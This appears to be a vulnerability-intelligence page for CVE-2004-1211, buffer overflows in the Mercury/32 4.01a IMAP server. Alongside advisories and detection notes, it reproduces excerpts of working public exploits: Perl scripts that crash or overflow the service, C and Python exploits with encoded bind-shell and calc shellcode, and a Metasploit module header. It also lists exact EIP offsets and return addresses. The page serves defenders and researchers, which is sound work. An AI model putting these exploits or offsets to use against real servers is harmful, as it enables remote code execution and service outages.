CVE-2004-1211
published 2005-01-10CVE-2004-1211: Multiple buffer overflows in the IMAP service in Mercury/32 4.01a allow remote authenticated users to cause a denial of service (application crash) and…
PriorityP352critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
72.46%
99.4th percentile
Multiple buffer overflows in the IMAP service in Mercury/32 4.01a allow remote authenticated users to cause a denial of service (application crash) and possibly execute arbitrary code via long arguments to the (1) EXAMINE, (2) SUBSCRIBE, (3) STATUS, (4) APPEND, (5) CHECK, (6) CLOSE, (7) EXPUNGE, (8) FETCH, (9) RENAME, (10) DELETE, (11) LIST, (12) SEARCH, (13) CREATE, or (14) UNSUBSCRIBE commands.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| david_harris | mercury | — | — |
| david_harris | mercury_32 | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x29\x81\x73\x17\xb1\x74\x3f\x7c
- →Flag IMAP CHECK command payloads of 512 or more repeated bytes ('A' x 512) sent to port 143 as a DoS/overflow attempt against Mercury/32. ↗
- →Flag IMAP SELECT command arguments exceeding 260 bytes followed by a 4-byte little-endian RET address and NOP sled pattern on port 143. ↗
- →After exploitation, watch for outbound TCP connections from the Mercury/32 IMAP server process to attacker-controlled port 1981 (bind-shell callback) or inbound connections to port 4444 (bind shell). ↗
- →The Metasploit module targets the RENAME command specifically; monitor for IMAP RENAME arguments exceeding normal mailbox name lengths on port 143. ↗
- →Detect SMTP AUTH CRAM-MD5 base64-encoded payloads of anomalous length (>1300 bytes) sent to Mercury/32 SMTP service — exploit DOC 7 delivers the overflow via the SMTP AUTH exchange. ↗
- ·The overflow offset for the SELECT command exploit is 260 bytes before EIP overwrite; the RET address 0x782f28f7 is environment-specific and must be adjusted per target OS/DLL. ↗
- ·The SMTP exploit (DOC 7) targets Mercury/32 SMTP versions 3.32 through 4.51 with different RET addresses per target; the universal target uses TER32.dll at 0x258d0d1e (jmp esp). ↗
- ·The EIP overwrite offset for the SMTP AUTH CRAM-MD5 vector is at byte 204 within a 1300-byte buffer; shellcode is placed immediately after the 4-byte NOP sled following EIP. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-24fw-p524-4547: Stack-based buffer overflow in IMAPD in Mercury/32 4
ghsa_unreviewed·2022-05-01·CVSS 10.0
CVE-2007-5018 [CRITICAL] CWE-119 GHSA-24fw-p524-4547: Stack-based buffer overflow in IMAPD in Mercury/32 4
Stack-based buffer overflow in IMAPD in Mercury/32 4.52 allows remote authenticated users to execute arbitrary code via a long argument in a SEARCH ON command. NOTE: this issue might overlap with CVE-2004-1211.
GHSA
GHSA-fvpw-h9g4-v5hg: Multiple buffer overflows in the IMAP service in Mercury/32 4
ghsa_unreviewed·2022-04-29
CVE-2004-1211 [HIGH] CWE-119 GHSA-fvpw-h9g4-v5hg: Multiple buffer overflows in the IMAP service in Mercury/32 4
Multiple buffer overflows in the IMAP service in Mercury/32 4.01a allow remote authenticated users to cause a denial of service (application crash) and possibly execute arbitrary code via long arguments to the (1) EXAMINE, (2) SUBSCRIBE, (3) STATUS, (4) APPEND, (5) CHECK, (6) CLOSE, (7) EXPUNGE, (8) FETCH, (9) RENAME, (10) DELETE, (11) LIST, (12) SEARCH, (13) CREATE, or (14) UNSUBSCRIBE commands.
No detection rules found.
Exploit-DB
Mercury/32 Mail Server 4.01a - IMAP RENAME Buffer Overflow (Metasploit)
exploitdb·2010-05-09
CVE-2004-1211 Mercury/32 Mail Server 4.01a - IMAP RENAME Buffer Overflow (Metasploit)
Mercury/32 Mail Server 4.01a - IMAP RENAME Buffer Overflow (Metasploit)
---
##
# $Id: mercury_rename.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Mercury/32 v4.01a IMAP RENAME Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow vulnerability in the
Mercury/32 v.4.01a IMAP service.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9262 $',
'References' =>
[
[ 'CVE', '2004-1211'],
[ 'OSVDB', '12508'],
[ 'BID', '11775'],
[ 'NSS', '15867'],
],
'Pri
Exploit-DB
Mercury/32 Mail Server 3.32 < 4.51 - SMTP EIP Overwrite
exploitdb·2007-08-26
CVE-2004-2513 Mercury/32 Mail Server 3.32 < 4.51 - SMTP EIP Overwrite
Mercury/32 Mail Server 3.32
#include
#include
#include
#pragma comment(lib,"ws2_32")
#include
void usage(char * s);
void logo();
void end_logo();
void prepare_shellcode(unsigned char * fsh, int sh);
void make_buffer(unsigned char * buf, unsigned int * len, int itarget, int sh);
int send_buffer(unsigned char * buf, unsigned int len, char * remotehost, int port);
SOCKET do_connect (char *remotehost, int port);
void base64_encode(unsigned char const* bytes_to_encode, unsigned int in_len, char * ret) ;
void base64_decode(char const * encoded_string, char * ret) ;
// -----------------------------------------------------------------
// XGetopt.cpp Version 1.2
// -----------------------------------------------------------------
int getopt(int argc, char *argv[], char *optstring);
char *optarg
Exploit-DB
Mercury/32 Mail Server 4.0.1 - 'LOGIN' Remote IMAP Stack Buffer Overflow
exploitdb·2007-03-24
CVE-2004-1211 Mercury/32 Mail Server 4.0.1 - 'LOGIN' Remote IMAP Stack Buffer Overflow
Mercury/32 Mail Server 4.0.1 - 'LOGIN' Remote IMAP Stack Buffer Overflow
---
#!/usr/bin/perl
#
# https://www.securityfocus.com/bid/11775
# credit to Muts for this vulnerability
# acaro [at] jervus.it
use IO::Socket::INET;
use Switch;
if (@ARGV new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
$socket or die "Cannot connect to host!\n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
send $socket, $request, 0;
print "[+] Sent 1st request\n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
sleep(1);
my $request ="\x41" x 255;
send $socket, $request, 0;
print "[+] Sent 2nd request\n";
sleep(1);
my $request=("\x45" x7420).("\x90" x10).$happy.("\x90" x14).$shellcode.("\x41" x8).$nextseh.$seh.("\x90" x5).$jmp.("\x90" x533);
send $socket, $request, 0;
print
Exploit-DB
Mercury/32 Mail Server 4.01a - 'check' Buffer Overflow
exploitdb·2004-12-01
CVE-2004-2513 Mercury/32 Mail Server 4.01a - 'check' Buffer Overflow
Mercury/32 Mail Server 4.01a - 'check' Buffer Overflow
---
#===== Start Mercury32_Overflow.pl =====
#
# Usage: Mercury32_Overflow.pl
# Mercury32_Overflow.pl 127.0.0.1 hello moto
#
# Mercury/32, v4.01a, Dec 8 2003
#
# Download:
# http://www.pmail.com/
#
#############################################################
use IO::Socket;
use strict;
my($socket) = "";
if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => "143",
Proto => "TCP"))
{
print "Attempting to kill Mercury/32 service at $ARGV[0]:143...";
sleep(1);
print $socket "0000 LOGIN $ARGV[1] $ARGV[2]\r\n";
sleep(1);
print $socket "0001 CHECK " . "A" x 512 . "\r\n";
close($socket);
}
else
{
print "Cannot connect to $ARGV[0]:143\n";
}
#===== End Mercury32_Overflow.pl =====
# milw0rm.com [2004-12-01]
Exploit-DB
Mercury/32 Mail Server 4.01 - 'Pegasus' IMAP Buffer Overflow (2)
exploitdb·2004-12-01
CVE-2004-2513 Mercury/32 Mail Server 4.01 - 'Pegasus' IMAP Buffer Overflow (2)
Mercury/32 Mail Server 4.01 - 'Pegasus' IMAP Buffer Overflow (2)
---
/** Remote Mercury32 Imap exploit [14 types of attacks] WOW!
** By: [email protected]
**
** Notes: Second public release and both of them are murcury32 ;)
** Again someone posted some dos code :( why bother?
** If you spent the time to look, it uses the same buffer for all 14 types of attacks and the size does not
** change. I did not check the asm but its prob using the same routine for all 14 commands.
**
** Date: 12/01/04
**/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define version "1.0"
int usage(char *p);
char sc_bind[] =
//decoder
"\xEB\x0F\x5B\x80\x33\x96\x43\x81\x3B\x45\x59\x34\x53\x75\xF4\x74"
"\x05\xE8\xEC\xFF\xFF\xFF"
/
Exploit-DB
Mercury/32 Mail Server 4.01 - 'Pegasus' IMAP Buffer Overflow (1)
exploitdb·2004-11-30
CVE-2004-2513 Mercury/32 Mail Server 4.01 - 'Pegasus' IMAP Buffer Overflow (1)
Mercury/32 Mail Server 4.01 - 'Pegasus' IMAP Buffer Overflow (1)
---
/* whitehat.co.il comments removed do to muts love */
/** Remote Mercury32 Imap exploit
** By: [email protected]
**/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define version "1.0"
int usage(char *p);
char sc_bind[] =
//decoder
"\xEB\x0F\x5B\x80\x33\x96\x43\x81\x3B\x45\x59\x34\x53\x75\xF4\x74"
"\x05\xE8\xEC\xFF\xFF\xFF"
//sc_bind_1981 for 2k/xp/2003 v1.03.10.09 by ey4s
//XOR with 0x96 (267 0x10B bytes)
"\x7E\xB2\x96\x96\x96\x22\xEB\x83\x0E\x5D\xD4\xE1\x2E\x4A\x4B\x8C"
"\xA5\x7F\x2D\x55\x38\x50\xBD\x2B\xB8\x48\xC1\xE4\x32\xB2\x24\xA4"
"\x96\x98\xCB\x5D\x48\xE2\xB4\xF5\x5E\xC9\xFC\xA6\xCD\xF2\x1D\x95"
"\x1D\xD6\x9A\x1D\xE6\x8A\x3B\x
Exploit-DB
Mercury/32 Mail Server 4.01 - 'Pegasus' IMAP Buffer Overflow (3)
exploitdb·2004-11-29
CVE-2004-2513 Mercury/32 Mail Server 4.01 - 'Pegasus' IMAP Buffer Overflow (3)
Mercury/32 Mail Server 4.01 - 'Pegasus' IMAP Buffer Overflow (3)
---
#########################################################
# #
# Mercury Mail 4.01 (Pegasus) IMAP Buffer Overflow #
# Discovered by : Muts #
# Coded by : Muts #
# WWW.WHITEHAT.CO.IL #
# Plain vanilla stack overflow in the SELECT command #
# #
#########################################################
import struct
import socket
from time import sleep
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Lame calc.exe shellcode - dont expect miracles!
sc2 = "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x29\x81\x73\x17\xb1\x74"
sc2 += "\x3f\x7c\x83\xeb\xfc\xe2\xf4\x4d\x9c\x69\x7c\xb1\x74\x6c\x29\xe7"
sc2 += "\x23\xb4\x10\x95\x6c\xb4\x39\x8d\xff\x6b\x79\xc9\x75\xd5\xf7\xfb"
sc2 += "\x6c\xb4\x26\x91\x75\xd4\x9f\x83\x3d\xb
Metasploit
Mercury/32 v4.01a IMAP RENAME Buffer Overflow
metasploit
Mercury/32 v4.01a IMAP RENAME Buffer Overflow
Mercury/32 v4.01a IMAP RENAME Buffer Overflow
This module exploits a stack buffer overflow vulnerability in the Mercury/32 v.4.01a IMAP service.
No writeups or analysis indexed.
http://home.kabelfoon.nl/~jaabogae/han/m_401b.htmlhttp://lists.grok.org.uk/pipermail/full-disclosure/2004-December/029701.htmlhttp://marc.info/?l=bugtraq&m=110193702909991&w=2http://secunia.com/advisories/13348http://www.osvdb.org/12508http://www.securityfocus.com/bid/11775https://exchange.xforce.ibmcloud.com/vulnerabilities/18318http://home.kabelfoon.nl/~jaabogae/han/m_401b.htmlhttp://lists.grok.org.uk/pipermail/full-disclosure/2004-December/029701.htmlhttp://marc.info/?l=bugtraq&m=110193702909991&w=2http://secunia.com/advisories/13348http://www.osvdb.org/12508http://www.securityfocus.com/bid/11775https://exchange.xforce.ibmcloud.com/vulnerabilities/18318
2005-01-10
Published